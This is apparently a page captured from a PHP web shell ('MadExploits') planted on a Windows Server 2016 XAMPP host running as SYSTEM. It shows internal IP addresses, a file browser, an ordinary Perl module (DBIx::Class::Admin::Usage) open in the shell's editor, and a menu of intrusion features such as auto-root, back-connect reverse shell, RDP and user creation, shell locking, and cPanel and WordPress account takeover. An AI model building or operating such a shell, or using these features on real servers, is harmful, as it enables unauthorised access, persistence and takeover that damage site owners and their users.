Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
DBIx /
Class /
Admin /
[ HOME SHELL ]
Name
Size
Permission
Action
Descriptive.pm
222
B
-rw-rw-rw-
Types.pm
994
B
-rw-rw-rw-
Usage.pm
1.77
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Usage.pm
package # hide from PAUSE DBIx::Class::Admin::Usage; use warnings; use strict; use base 'Getopt::Long::Descriptive::Usage'; use base 'Class::Accessor::Grouped'; __PACKAGE__->mk_group_accessors('simple', 'synopsis', 'short_description'); sub prog_name { Getopt::Long::Descriptive::prog_name(); } sub set_simple { my ($self,$field, $value) = @_; my $prog_name = prog_name(); $value =~ s/%c/$prog_name/g; $self->next::method($field, $value); } # This returns the usage formatted as a pod document sub pod { my ($self) = @_; return join qq{\n}, $self->pod_leader_text, $self->pod_option_text, $self->pod_authorlic_text; } sub pod_leader_text { my ($self) = @_; return qq{=head1 NAME\n\n}.prog_name()." - ".$self->short_description().qq{\n\n}. qq{=head1 SYNOPSIS\n\n}.$self->leader_text().qq{\n}.$self->synopsis().qq{\n\n}; } sub pod_authorlic_text { return join ("\n\n", '=head1 AUTHORS', 'See L<DBIx::Class/AUTHORS>', '=head1 LICENSE', 'You may distribute this code under the same terms as Perl itself', '=cut', ); } sub pod_option_text { my ($self) = @_; my @options = @{ $self->{options} || [] }; my $string = q{}; return $string unless @options; $string .= "=head1 OPTIONS\n\n=over\n\n"; foreach my $opt (@options) { my $spec = $opt->{spec}; my $desc = $opt->{desc}; next if ($desc eq 'hidden'); if ($desc eq 'spacer') { $string .= "=back\n\n=head2 $spec\n\n=cut\n\n=over\n\n"; next; } $spec = Getopt::Long::Descriptive->_strip_assignment($spec); $string .= "=item " . join " or ", map { length > 1 ? "B<--$_>" : "B<-$_>" } split /\|/, $spec; $string .= "\n\n$desc\n\n=cut\n\n"; } $string .= "=back\n\n"; return $string; } 1;
Close